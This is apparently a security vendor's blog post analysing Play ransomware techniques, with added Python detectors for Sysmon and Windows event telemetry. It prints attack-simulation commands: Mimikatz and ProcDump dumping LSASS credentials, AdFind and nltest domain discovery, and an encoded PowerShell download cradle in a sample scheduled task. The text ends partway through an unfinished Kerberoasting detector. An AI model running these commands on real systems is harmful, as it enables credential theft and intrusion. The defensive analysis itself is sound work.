Sıla Özeren | February 26, 2025 | 12 MIN READ

LAST UPDATED ON FEBRUARY 26, 2025

Play Ransomware: Exposing One of 2024's Greediest Cyber Extortionists

Play ransomware, also known as PlayCrypt, is a cybercriminal group that emerged in 2022, responsible for ransomware attacks on various organizations worldwide. They employ a double-extortion model, encrypting systems after exfiltrating data, and instruct victims to contact them via email without specifying an initial ransom demand. The group has targeted over 300 entities across North America, South America, Europe, and Australia, affecting sectors such as telecommunications, healthcare, media, transportation, construction, and government.

In this blog, we will analyze the tactics, techniques, and procedures (TTPs) of the Play Ransomware group, providing detailed insights into their operational evolution, methods of attack, and the potential defense strategies that can help mitigate their impact.

Analyzing Play Ransomware's Advanced Tactics, Techniques, and Procedures (TTPs)

This section walks through the TTPs observed in Play ransomware intrusions, the tools behind each one, and how each is simulated.

TA0002: Execution

T1106 - Native API

Creating CobaltStrike Default Named Pipes

Play ransomware actors have used Cobalt Strike, a widely used red teaming and post-exploitation tool, to assist with lateral movement and file execution. 

Originally designed for penetration testers, Cobalt Strike is frequently abused by threat actors to establish covert command-and-control (C2) channels, execute payloads, and escalate privileges while evading detection.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves creating Cobalt Strike default named pipes.


cmd.exe /c rundll32.exe "%TMP%\cspipe.dll",cspipe

This command executes cmd.exe with the /c switch, launching rundll32.exe to load and run the cspipe function from cspipe.dll stored in the %TMP% directory. Rundll32.exe, a legitimate Windows utility, is commonly abused by attackers for executing malicious payloads while evading detection. 

Here cspipe.dll is the simulation's DLL rather than a Cobalt Strike component: its cspipe export creates named pipes with the default names a Cobalt Strike Beacon uses for SMB beacons, Artifact Kit stagers, and post-exploitation jobs (for example msagent_##, MSSE-####-server, and postex_####). Those default names are the detection opportunity, since pipe-creation telemetry such as Sysmon Event ID 17 records them; an operator who sets a custom pipename in a Malleable C2 profile will not trigger a name-based rule.

This action within the Play Ransomware threat in Picus SCV mimics attackers moving laterally within a network while blending in with legitimate system activity, making detection more difficult.
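
As an added detection-side example (not Picus's code and not something the Play actors run), the following Python checks pipe-creation telemetry for Cobalt Strike's default pipe names. The Sysmon events are constructed, and the pattern list covers the documented defaults only; a Beacon built with a custom pipename in its Malleable C2 profile will not match.

```python
import re
from typing import Dict, List

# Default Beacon pipe names documented for Cobalt Strike (SMB beacon, Artifact Kit
# stager, post-exploitation jobs).  Suffix widths vary by version, so a bounded run
# of hex digits is matched.  An operator who sets a custom 'pipename' in a
# Malleable C2 profile will not match: this is a default-configuration detector.
CS_DEFAULT_PIPE_PATTERNS = [
    re.compile(r"^\\msagent_[0-9a-f]{2,}$", re.I),
    re.compile(r"^\\MSSE-\d{1,4}-server$", re.I),
    re.compile(r"^\\postex_[0-9a-f]{4,}$", re.I),
    re.compile(r"^\\postex_ssh_[0-9a-f]{4,}$", re.I),
    re.compile(r"^\\status_[0-9a-f]{2,}$", re.I),
]

# Constructed Sysmon pipe events (ID 17 = PipeCreated, 18 = PipeConnected),
# flattened to tab-separated Key=Value fields as a SIEM export might produce.
SAMPLE_EVENTS = [
    "EventID=17\tImage=C:\\Windows\\System32\\rundll32.exe\tPipeName=\\msagent_f4",
    "EventID=17\tImage=C:\\Windows\\System32\\spoolsv.exe\tPipeName=\\spoolss",
    "EventID=18\tImage=C:\\Windows\\System32\\svchost.exe\tPipeName=\\MSSE-1337-server",
    "EventID=17\tImage=C:\\Windows\\System32\\rundll32.exe\tPipeName=\\postex_4e0a",
    "EventID=1\tImage=C:\\Windows\\System32\\cmd.exe\tCommandLine=whoami",
    "EventID=17\tImage=C:\\Program Files\\App\\app.exe\tPipeName=\\status_upd",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a tab-separated Key=Value line into a dict (values may contain spaces)."""
    return dict(part.split("=", 1) for part in line.split("\t") if "=" in part)


def is_cobalt_strike_default_pipe(pipe_name: str) -> bool:
    """True when the pipe name matches one of the documented Cobalt Strike defaults."""
    return any(p.match(pipe_name) for p in CS_DEFAULT_PIPE_PATTERNS)


def find_default_pipe_events(lines: List[str]) -> List[Dict[str, str]]:
    """Return pipe create/connect events whose pipe name matches a Cobalt Strike default."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") not in ("17", "18"):
            continue
        if is_cobalt_strike_default_pipe(ev.get("PipeName", "")):
            hits.append({"EventID": ev["EventID"], "Image": ev.get("Image", ""),
                         "PipeName": ev["PipeName"]})
    return hits


if __name__ == "__main__":
    for hit in find_default_pipe_events(SAMPLE_EVENTS):
        print(f"[CS default pipe] event {hit['EventID']}: {hit['Image']} -> {hit['PipeName']}")
```

Pair the name match with the creating image: rundll32.exe or svchost.exe creating an msagent_ or postex_ pipe is far more telling than the name alone, and the Picus simulation above (rundll32.exe loading a DLL from %TMP%) is exactly the shape this rule is meant to catch.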

T1059 - Command and Scripting Interpreter

Using winPEAS for Privilege Escalation

Play ransomware leverages winPEAS (Windows Privilege Escalation Awesome Script), a widely used enumeration tool, to collect the information needed to escalate privileges on a compromised host. Run through a command or scripting interpreter, it automates a long list of local checks: unquoted service paths, services and scheduled tasks whose binaries or directories are writable by the current user, the AlwaysInstallElevated policy, credentials stored in files and the registry, token privileges such as SeImpersonatePrivilege, and installed software and missing patches.

winPEAS itself does not escalate anything; it reports candidate weaknesses, colour-coded by likelihood, and the operator then exploits the most promising one to run payloads with higher privileges and deepen control of the host. Because it is a single script that touches the registry, the file system, and the service database in quick succession, its execution is itself a detectable burst of reconnaissance.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging the Winpeas Windows Privilege Escalation Tool for command execution.

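
To show what one of winPEAS's checks actually computes, here is an added Python example (not winPEAS code and not from the page) that implements the unquoted service path check: for each service ImagePath, it lists the executables Windows would try to launch before the real one. The service table is constructed; the next step winPEAS takes, testing whether the current user can write to each candidate's directory, is left out because it only makes sense on a live Windows host.

```python
from typing import Dict, List

# Constructed ImagePath values as read from HKLM\SYSTEM\CurrentControlSet\Services\<svc>.
SAMPLE_SERVICES = {
    "AcmeUpdater": r"C:\Program Files\Acme Software\Updater\acmeupd.exe -service",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "VendorAgent": r'"C:\Program Files\Vendor\agent.exe" --daemon',
    "LegacyBackup": r"C:\Backup Tools\bk.exe",
}


def unquoted_path_candidates(image_path: str) -> List[str]:
    """Return the executables Windows would try before the intended one.

    CreateProcess parses an unquoted command line left to right, treating each
    space as a possible end of the executable name.  For
    'C:\\Program Files\\My App\\svc.exe -arg' it tries 'C:\\Program.exe', then
    'C:\\Program Files\\My.exe', and only then the real binary.  Returns an
    empty list for quoted paths and for paths without a space before '.exe'.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    end = path.lower().find(".exe")
    if end == -1:
        return []
    exe = path[: end + 4]          # executable portion only, arguments dropped
    parts = exe.split(" ")
    # One candidate per space; the final element is the real path, not a candidate.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted_service_paths(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map service name -> hijack candidates for every service with an unquoted, spaced path.

    A candidate matters only if the current user can create a file at that path
    (typically a writable C:\\ root or vendor directory), which winPEAS checks next.
    """
    findings: Dict[str, List[str]] = {}
    for name, image_path in services.items():
        candidates = unquoted_path_candidates(image_path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for service, candidates in find_unquoted_service_paths(SAMPLE_SERVICES).items():
        print(f"{service}: Windows would try {candidates} first")
```

A service that runs as LocalSystem with such a path and a writable candidate directory is a direct path from a standard user to SYSTEM, which is why the check sits near the top of every privilege escalation enumeration script.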

TA0003: Persistence

T1053.005 - Scheduled Task/Job: Scheduled Task

Creating a New Scheduled Task by using schtasks

Play ransomware was observed creating a new scheduled task using schtasks, a technique commonly employed for persistence and defense evasion. By scheduling a malicious PowerShell script to execute at a specific time, attackers ensure that their payload runs automatically without requiring direct user interaction. 

The task is disguised with a benign name and description to avoid suspicion, allowing the ransomware to maintain access, execute secondary payloads, or re-establish itself after system reboots. This method helps adversaries blend in with legitimate system activities while ensuring continued execution of their malicious operations.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging PowerShell to create a scheduled task.
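
As an added example of how a defender would inspect such a task (not Picus's simulation and not code from the Play actors), the following Python parses a Task Scheduler XML definition, the same XML that Security event 4698 carries and that schtasks /query /xml exports, and flags the PowerShell switches the text describes: a hidden window, no profile, an execution-policy bypass, and an encoded command, which it decodes. Both task definitions and the encoded payload are constructed; the download URL points at a reserved, non-routable name.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# PowerShell switches that are rare on legitimate scheduled tasks.
SUSPICIOUS_ARGS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})"),
    "hidden_window":   re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "no_profile":      re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "bypass_policy":   re.compile(r"(?i)(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass\b"),
}
POWERSHELL_CMD = re.compile(r"(?i)(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$")
DANGEROUS_IN_DECODED = re.compile(r"(?i)downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string")

# Constructed payload: a download cradle aimed at a reserved, non-routable name.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed task in the style the text describes: benign description, hidden window,
# encoded command.  (No XML declaration: ElementTree rejects UTF-16 declarations in str input.)
SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Checks for Windows component updates</Description></RegistrationInfo>
  <Triggers><TimeTrigger><StartBoundary>2025-02-26T03:00:00</StartBoundary></TimeTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -nop -ep bypass -enc {_ENCODED}</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Nightly backup</Description></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Scripts\\backup.cmd</Command>
      <Arguments>/full</Arguments>
    </Exec>
  </Actions>
</Task>"""


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of a UTF-16LE string; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_task_xml(task_xml: str) -> Dict[str, object]:
    """Inspect the <Exec> action of a task definition and list findings."""
    root = ET.fromstring(task_xml)
    exec_node = root.find(f"./{TASK_NS}Actions/{TASK_NS}Exec")
    command = exec_node.findtext(f"{TASK_NS}Command", default="") if exec_node is not None else ""
    args = exec_node.findtext(f"{TASK_NS}Arguments", default="") if exec_node is not None else ""
    description = root.findtext(f"./{TASK_NS}RegistrationInfo/{TASK_NS}Description", default="")
    findings: List[str] = []
    decoded: Optional[str] = None
    if POWERSHELL_CMD.search(command.strip().strip('"')):
        for name, pattern in SUSPICIOUS_ARGS.items():
            match = pattern.search(args)
            if not match:
                continue
            findings.append(name)
            if name == "encoded_command":
                decoded = decode_encoded_command(match.group(1))
        if decoded and DANGEROUS_IN_DECODED.search(decoded):
            findings.append("decoded_payload_downloads_or_evals")
    return {"description": description, "command": command, "arguments": args,
            "findings": findings, "decoded": decoded}


if __name__ == "__main__":
    result = analyze_task_xml(SAMPLE_TASK_XML)
    print(f"'{result['description']}': {result['findings']}")
    print("decoded:", result["decoded"])
```

The benign-looking description is exactly why the task name and description are not useful signals; the action's command line is. Hunting on 4698 with this logic also catches tasks registered through the Task Scheduler API rather than schtasks.exe, which process-creation telemetry alone would miss.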

TA0007: Discovery

a. T1018 - Remote System Discovery

Leveraging the Adfind Tool

Play ransomware leverages Adfind, a legitimate command-line tool designed for querying Active Directory, to gather information about the target domain and operating systems. By executing specific LDAP queries, it enumerates domain-joined computers, extracting details such as hostnames, operating system versions, and other key attributes. 

This reconnaissance step helps attackers map the network, identify high-value targets, and plan lateral movement within the compromised environment.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves testing the ingress tool transfer of Adfind to the system.

For instance, Picus Security Control Validation runs the following payload, followed by a rewind process, to mimic Play Ransomware’s discovery technique.

cmd.exe /c ""%TMP%\adfind.exe" -f objectcategory=computer -csv name cn OperatingSystem dNSHostName > "%TMP%\some.csv""

This command executes cmd.exe with the /c switch, which runs the specified command and then terminates. It calls adfind.exe from the %TMP% directory, a common location for attackers to drop temporary tools. 

adfind.exe is a legitimate Active Directory enumeration tool, and here it is used to query all computer objects (-f objectcategory=computer) and extract their name, cn (Common Name), OperatingSystem, and dNSHostName attributes. 

The results are formatted as CSV (-csv) and saved to a file named some.csv in the %TMP% directory. This technique is often used in reconnaissance phases of attacks to gather information about domain-joined machines.

b. T1018 - Remote System Discovery

Leveraging the nltest Tool

Play ransomware utilizes nltest, a built-in Windows command-line tool, to enumerate domain controllers within a target network. By running specific nltest commands, attackers can identify domain controllers, their roles, and trust relationships, providing crucial insights for lateral movement and privilege escalation. Since nltest is a legitimate administrative tool, its usage can blend in with normal network activity, making detection more challenging for defenders.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging a built-in tool called nltest.

cmd.exe /c nltest /dclist:

This command executes cmd.exe with the /c switch, which runs the specified command and then terminates. It calls nltest /dclist: to enumerate all domain controllers within the current Active Directory domain (the empty value after the colon means "the current domain"). Nltest is a legitimate Windows command-line tool for testing secure channels and querying domain controllers and trust relationships.

By running this command, an attacker can quickly obtain a list of domain controllers, which are critical infrastructure components responsible for authentication and directory services. This information is valuable for planning lateral movement and privilege escalation within a compromised environment.

T1082 - System Information Discovery

Gathering Disk Information from the Target via WMIC.exe

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging a built-in tool called WMIC.exe.

wmic.exe logicaldisk get size,freespace,caption

This technique mimics an attacker conducting system reconnaissance to gather information about the available disk space before deploying ransomware. 


By leveraging WMIC.exe, a legitimate Windows command-line utility, Play ransomware actors can retrieve details about logical drives, including their total size and free space. This information helps adversaries determine which drives contain valuable data and assess storage availability for encrypting files. Since WMIC.exe is a built-in tool commonly used by administrators, its abuse allows attackers to evade detection while silently preparing for data encryption or exfiltration.

T1087.002 - Account Discovery: Domain Account

Play ransomware was observed running Invoke-BloodHound, the collection function of SharpHound (BloodHound's ingestor), to enumerate domain accounts, group memberships, sessions, and ACLs and build a graph of attack paths to high-privilege accounts.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging BloodHound Tool's Ingestor (Invoke-BloodHound) Function.

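
The four discovery commands in this section (the AdFind computer query, nltest /dclist:, wmic logicaldisk, and Invoke-BloodHound) are individually noisy to alert on, since administrators run some of them too. As an added detection example (not Picus's code and not from the Play actors), the following Python classifies process-creation command lines against those signatures and alerts only when one host runs two or more different discovery categories inside a short window. The process events are constructed; the window and threshold are assumptions to tune per environment.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Ordered: the first matching signature wins, so the specific AdFind computer
# query is tested before the generic AdFind match.
DISCOVERY_SIGNATURES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("adfind_computers", re.compile(r"(?i)\badfind(?:\.exe)?\b.*objectcategory=computer")),
    ("adfind_other",     re.compile(r"(?i)\badfind(?:\.exe)?\b")),
    ("nltest_dclist",    re.compile(r"(?i)\bnltest(?:\.exe)?\b.*/dclist")),
    ("nltest_trusts",    re.compile(r"(?i)\bnltest(?:\.exe)?\b.*/domain_trusts")),
    ("wmic_disks",       re.compile(r"(?i)\bwmic(?:\.exe)?\b.*logicaldisk")),
    ("bloodhound",       re.compile(r"(?i)invoke-bloodhound|sharphound")),
]

# Constructed process-creation events: ISO timestamp, then tab-separated fields.
EVENT_RE = re.compile(r"^(\S+)\thost=(\S+)\tuser=(\S+)\tcmd=(.*)$")
SAMPLE_EVENTS = [
    "2025-02-26T10:01:05\thost=WS01\tuser=CORP\\jdoe\tcmd=cmd.exe /c \"\"%TMP%\\adfind.exe\" -f objectcategory=computer -csv name cn OperatingSystem dNSHostName > \"%TMP%\\some.csv\"\"",
    "2025-02-26T10:01:40\thost=WS01\tuser=CORP\\jdoe\tcmd=cmd.exe /c nltest /dclist:",
    "2025-02-26T10:02:10\thost=WS01\tuser=CORP\\jdoe\tcmd=wmic.exe logicaldisk get size,freespace,caption",
    "2025-02-26T10:03:00\thost=WS01\tuser=CORP\\jdoe\tcmd=powershell.exe -ep bypass -c \"Import-Module .\\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All\"",
    "2025-02-26T11:30:00\thost=SRV02\tuser=CORP\\svc_backup\tcmd=wmic.exe logicaldisk get size,freespace,caption",
    "2025-02-26T11:31:00\thost=ADMIN01\tuser=CORP\\admin\tcmd=nltest /dclist:",
    "2025-02-26T15:31:00\thost=ADMIN01\tuser=CORP\\admin\tcmd=wmic.exe logicaldisk get caption",
    "2025-02-26T15:32:00\thost=ADMIN01\tuser=CORP\\admin\tcmd=notepad.exe C:\\ReadMe.txt",
]


def parse_process_event(line: str) -> Optional[Dict[str, object]]:
    """Return {time, host, user, cmd} for a well-formed line, else None."""
    match = EVENT_RE.match(line)
    if not match:
        return None
    ts, host, user, cmd = match.groups()
    return {"time": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd}


def classify_command(cmd: str) -> Optional[str]:
    """Name of the first discovery signature the command line matches, or None."""
    for name, pattern in DISCOVERY_SIGNATURES:
        if pattern.search(cmd):
            return name
    return None


def correlate_discovery(lines: List[str], window: timedelta = timedelta(minutes=10),
                        min_categories: int = 2) -> Dict[str, List[str]]:
    """Hosts that ran >= min_categories distinct discovery categories within `window`."""
    by_host: Dict[str, List[Tuple[datetime, str]]] = {}
    for line in lines:
        ev = parse_process_event(line)
        if ev is None:
            continue
        category = classify_command(ev["cmd"])
        if category:
            by_host.setdefault(ev["host"], []).append((ev["time"], category))
    alerts: Dict[str, set] = {}
    for host, events in by_host.items():
        events.sort()
        for i, (start, _) in enumerate(events):        # sliding window from each event
            in_window = {cat for t, cat in events[i:] if t - start <= window}
            if len(in_window) >= min_categories:
                alerts.setdefault(host, set()).update(in_window)
    return {host: sorted(cats) for host, cats in alerts.items()}


if __name__ == "__main__":
    for host, categories in correlate_discovery(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: discovery burst {categories}")
```

In the sample, WS01 fires (four categories in two minutes), SRV02 does not (one command), and ADMIN01 does not either, because its two discovery commands are four hours apart. The same grouping keyed on user rather than host catches an actor who hops between machines with one stolen account.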

TA0006: Credential Access

a. T1003.001 - OS Credential Dumping: LSASS Memory

Gathering Credentials Using the Mimikatz Tool

Play ransomware leverages Mimikatz, a well-known post-exploitation tool, to dump credentials from memory using the sekurlsa::logonPasswords module. This technique allows attackers to extract plaintext passwords, NTLM hashes, and Kerberos tickets from a compromised system, enabling privilege escalation and lateral movement. 

By obtaining valid credentials, adversaries can access additional machines, move deeper into the network, and escalate their attack without tripping controls that only look for known malware. Because Mimikatz opens the Local Security Authority Subsystem Service process (lsass.exe) and reads its memory, that process access is one of the highest-fidelity indicators of credential theft in ransomware operations.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves the use of Mimikatz for credential dumping by extracting credentials from LSASS memory.

# Play Process
%TMP%\mimikatz22020220919x64.exe "privilege::debug" "sekurlsa::logonPasswords" exit
# Rewind Process
{predefined-file-delete} %TMP%\mimikatz22020220919x64.exe


b. T1003.001 - OS Credential Dumping: LSASS Memory

Dump Address Space of lsass.exe via Procdump

Adversaries use ProcDump, a legitimate Sysinternals tool, to dump the memory of the Local Security Authority Subsystem Service (LSASS) for credential theft. By capturing an LSASS process dump, attackers can extract plaintext passwords, NTLM hashes, and Kerberos tickets, enabling privilege escalation and lateral movement. 

Since ProcDump is a trusted Microsoft tool designed for debugging, its abuse allows attackers to evade security detections that might flag traditional malware-based credential dumping techniques.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves the use of Procdump for credential dumping by extracting credentials from LSASS memory.

%TMP%\procdump.exe -accepteula -ma lsass.exe "%TMP%\lsass.dmp"
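
Both the Mimikatz and the ProcDump simulations above open lsass.exe for reading, which is what Sysmon Event ID 10 (ProcessAccess) records. As an added detection example (not Picus's code and not from the Play actors), the following Python decodes the GrantedAccess mask of constructed Event 10 records, keeps only accesses to lsass.exe that include read or tamper rights, drops an assumed allowlist of system processes, and rates the rest. The allowlist is illustrative and must be rebuilt from your own telemetry.

```python
from typing import Dict, List, Optional

# Process access rights (winnt.h) that allow reading or tampering with lsass memory.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION  = 0x0008
PROCESS_VM_READ       = 0x0010
PROCESS_VM_WRITE      = 0x0020
PROCESS_ALL_ACCESS    = 0x1FFFFF
READ_OR_TAMPER = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE
TAMPER_ONLY    = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Assumed baseline of processes that open lsass with such rights on a typical host.
# Illustrative only; build the real list from your own telemetry.
BENIGN_SOURCES = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\lsm.exe",
    "c:\\program files\\windows defender\\msmpeng.exe",
}

# Constructed Sysmon Event 10 records, tab-separated Key=Value.  CallTrace keeps
# Sysmon's own '|' frame separator.
SAMPLE_EVENTS = [
    "SourceImage=C:\\Users\\jdoe\\AppData\\Local\\Temp\\mimikatz22020220919x64.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1010\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d234|UNKNOWN(00000000005A1C3F)",
    "SourceImage=C:\\Users\\jdoe\\AppData\\Local\\Temp\\procdump.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1FFFFF\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d234|C:\\Windows\\SYSTEM32\\dbgcore.DLL+1c2b1",
    "SourceImage=C:\\Windows\\system32\\csrss.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1FFFFF\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d234",
    "SourceImage=C:\\Windows\\system32\\svchost.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1000\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d234",
    "SourceImage=C:\\Windows\\system32\\taskmgr.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1410\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d234",
    "SourceImage=C:\\Windows\\explorer.exe\tTargetImage=C:\\Windows\\system32\\notepad.exe\tGrantedAccess=0x1FFFFF\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d234",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a tab-separated Key=Value line into a dict."""
    return dict(part.split("=", 1) for part in line.split("\t") if "=" in part)


def assess_lsass_access(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a risky lsass.exe access, or None."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if not granted & READ_OR_TAMPER:
        return None                     # e.g. 0x1000 PROCESS_QUERY_LIMITED_INFORMATION: harmless
    source = event.get("SourceImage", "").lower()
    if source in BENIGN_SOURCES:
        return None
    trace = event.get("CallTrace", "").lower()
    # MiniDumpWriteDump lives in dbgcore.dll/dbghelp.dll: the ProcDump-style dump path.
    dump_api = "dbgcore.dll" in trace or "dbghelp.dll" in trace
    from_system_dir = source.startswith("c:\\windows\\") or source.startswith("c:\\program files")
    high = (dump_api or granted == PROCESS_ALL_ACCESS
            or bool(granted & TAMPER_ONLY) or not from_system_dir)
    return {"source": source, "granted_access": hex(granted),
            "dump_api_in_trace": dump_api, "severity": "high" if high else "medium"}


def scan_process_access(lines: List[str]) -> List[Dict[str, object]]:
    """Findings for every risky lsass access in the given Event 10 records."""
    findings = []
    for line in lines:
        finding = assess_lsass_access(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_process_access(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['source']} opened lsass with {f['granted_access']}"
              f"{' via MiniDump API' if f['dump_api_in_trace'] else ''}")
```

Mimikatz asks for 0x1010 (PROCESS_VM_READ plus PROCESS_QUERY_LIMITED_INFORMATION), ProcDump for full access, and both land as high because of the rights requested and the %TMP% location; Task Manager's 0x1410 from the system directory is the medium-severity noise you will have to baseline. Protected Process Light for LSASS or Credential Guard turns most of these opens into failures, which Sysmon still logs.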

T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting

Play ransomware uses Kerberoasting to obtain credentials for high-privilege service accounts. Any authenticated domain user can request a Kerberos service ticket (TGS) for an account that carries a Service Principal Name; part of that ticket is encrypted with a key derived from the service account's password, so the ticket can be taken offline and cracked, and RC4-encrypted tickets (encryption type 0x17) are by far the cheapest to crack. In the simulated chain, Rubeus performs the ticket requests, and SigFlip.exe is run first to prepare the carrier binary: it writes a payload into the Authenticode signature block of the signed MSBuild.exe and saves the result as notmsbuild.exe; because the signature hash does not cover that block, the file still passes signature validation.

MSBuild.exe is a known LOLBin (Living-Off-the-Land Binary) that attackers abuse to compile and run code from project files without dropping an obviously malicious executable. Running the Kerberoasting tooling from a still-signed copy lets the actors execute arbitrary code under a trusted-looking binary, evade signature-based controls, and pull crackable service-account material out of Active Directory for later lateral movement.

How Do We Help?

Perform Kerberoasting Attack by using Rubeus Tool (SigFlip)

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves use of Rubeus for Kerberoasting. 

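
Kerberoasting leaves a characteristic trail in Security event 4769 on the domain controllers: one account requesting RC4 (0x17) service tickets for several different service accounts in a short burst. As an added detection example (not Picus's code and not the Play actors' tooling), the following Python applies that logic to constructed 4769 records. The window and threshold are assumptions; in an AES-only domain, or against a tool that requests AES tickets, the encryption-type signal disappears and only the volume signal remains.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

RC4_HMAC = 0x17   # TicketEncryptionType for RC4; AES128 is 0x11, AES256 is 0x12

# Constructed Security event 4769 records ("A Kerberos service ticket was requested"),
# as an ISO timestamp plus tab-separated Key=Value fields.  ServiceName in 4769 is the
# service *account* (machine accounts end in '$'), not the SPN string itself.
SAMPLE_4769 = [
    "2025-02-26T10:05:01\tTargetUserName=jdoe@CORP.LOCAL\tServiceName=svc_mssql\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T10:05:02\tTargetUserName=jdoe@CORP.LOCAL\tServiceName=svc_http\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T10:05:02\tTargetUserName=jdoe@CORP.LOCAL\tServiceName=svc_sharepoint\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T10:05:03\tTargetUserName=jdoe@CORP.LOCAL\tServiceName=svc_report\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T10:05:03\tTargetUserName=jdoe@CORP.LOCAL\tServiceName=DB01$\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T10:05:04\tTargetUserName=jdoe@CORP.LOCAL\tServiceName=svc_fileshare\tTicketEncryptionType=0x12\tStatus=0x0",
    "2025-02-26T09:00:00\tTargetUserName=asmith@CORP.LOCAL\tServiceName=svc_mssql\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T12:00:00\tTargetUserName=asmith@CORP.LOCAL\tServiceName=svc_http\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T14:00:00\tTargetUserName=asmith@CORP.LOCAL\tServiceName=svc_report\tTicketEncryptionType=0x17\tStatus=0x0",
    "2025-02-26T10:06:00\tTargetUserName=WS01$@CORP.LOCAL\tServiceName=krbtgt\tTicketEncryptionType=0x12\tStatus=0x0",
]


def parse_4769(line: str) -> Tuple[datetime, Dict[str, str]]:
    """Split a record into its timestamp and a field dict."""
    ts, rest = line.split("\t", 1)
    fields = dict(part.split("=", 1) for part in rest.split("\t") if "=" in part)
    return datetime.fromisoformat(ts), fields


def is_roastable_request(fields: Dict[str, str]) -> bool:
    """A successful RC4 service-ticket request for a user (non-machine, non-krbtgt) account."""
    service = fields.get("ServiceName", "")
    if service.lower().startswith("krbtgt") or service.endswith("$"):
        return False                                # TGT traffic and machine accounts: not targets
    if fields.get("Status", "0x0") != "0x0":
        return False                                # failed requests carry no crackable material
    return int(fields.get("TicketEncryptionType", "0x0"), 16) == RC4_HMAC


def detect_kerberoasting(lines: List[str], window: timedelta = timedelta(minutes=5),
                         min_services: int = 3) -> Dict[str, List[str]]:
    """Accounts that obtained RC4 tickets for >= min_services distinct services within `window`."""
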